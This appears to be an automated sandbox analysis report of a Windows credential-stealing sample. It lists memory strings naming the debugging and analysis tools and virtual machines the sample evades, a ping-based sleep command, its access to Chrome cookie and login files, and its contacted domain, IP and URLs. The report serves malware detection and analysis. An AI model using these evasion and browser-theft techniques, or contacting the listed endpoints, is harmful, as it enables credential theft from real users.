Source: aOn5CfTiwS.exe, 00000000.00000003.213585435.00000000022BB000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: aOn5CfTiwS.exe, 00000000.00000003.213567908.00000000022B2000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}CC?
Source: aOn5CfTiwS.exe, 00000000.00000003.213561044.0000000002DF6000.00000004.00000040.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}U
Source: ecv71A3.tmp.1.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=31fc4362adbf4e51ac951f4816f7487c&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: See collectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsError from reader: %sbad allocationsessionurls_to_restore_on_startuptabnew_open_urlbad allocationAfx:400000:8:10003:0:WPETCPViewClassTStdHttpAnalyzerFormgdkWindowToplevelXTPMainFrameHTTP DebuggerTelerik FiddlerASExplorerSunAwtFrameCharlesBurp Suitebad allocationvmwarevirtualvboxDisplayLegacyDriverDiskDriveCDROMMousebad allocation=> Send header=> Send data=> Send SSL data<= Recv header<= Recv data<= Recv SSL data[OnDebug] text = %s
Source: aOn5CfTiwS.exe, 00000000.00000003.213534311.00000000022DE000.00000004.00000001.sdmp Binary or memory string: SWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00951C57
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040D071
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00958290 GetProcessHeap,HeapFree, 2_2_00958290
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095461F SetUnhandledExceptionFilter, 2_2_0095461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00951C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0095631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0095373A

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA, 2_2_00957189
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A51E8 GetLocalTime,wsprintfA, 0_2_004A51E8
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A52D8 GetVersion,GetCurrentThreadId,EnumThreadWindows, 0_2_004A52D8
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346349 Sample: aOn5CfTiwS Startdate: 30/01/2021 Architecture: WINDOWS Score: 80 36 Multi AV Scanner detection for submitted file 2->36 38 Uses ping.exe to sleep 2->38 40 Machine Learning detection for sample 2->40 42 2 other signatures 2->42 7 aOn5CfTiwS.exe 1 23 2->7         started        process3 dnsIp4 32 1a469593c1fe15dc.xyz 198.54.117.244, 49719, 49722, 49724 NAMECHEAP-NETUS United States 7->32 24 C:\Users\user\AppData\...\1612058829275.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 7->26 dropped 28 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 7->28 dropped 30 7 other files (none is malicious) 7->30 dropped 44 Detected unpacking (creates a PE file in dynamic memory) 7->44 46 Installs new ROOT certificates 7->46 48 Tries to harvest and steal browser information (history, passwords, etc) 7->48 12 cmd.exe 1 7->12         started        16 1612058829275.exe 2 7->16         started        18 ThunderFW.exe 1 7->18         started        file5 signatures6 process7 dnsIp8 34 127.0.0.1 unknown unknown 12->34 50 Uses ping.exe to sleep 12->50 20 conhost.exe 12->20         started        22 PING.EXE 1 12->22         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.244
 unknown United States
22612 NAMECHEAP-NETUS false

Private
IP
127.0.0.1

Contacted Domains

Name IP Active
1a469593c1fe15dc.xyz 198.54.117.244 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://1a469593c1fe15dc.xyz/info/fb false
  • Avira URL Cloud: safe
 unknown
http://1a469593c1fe15dc.xyz/info/step false
  • Avira URL Cloud: safe
 unknown
http://1a469593c1fe15dc.xyz/info/dd false
  • Avira URL Cloud: safe
 unknown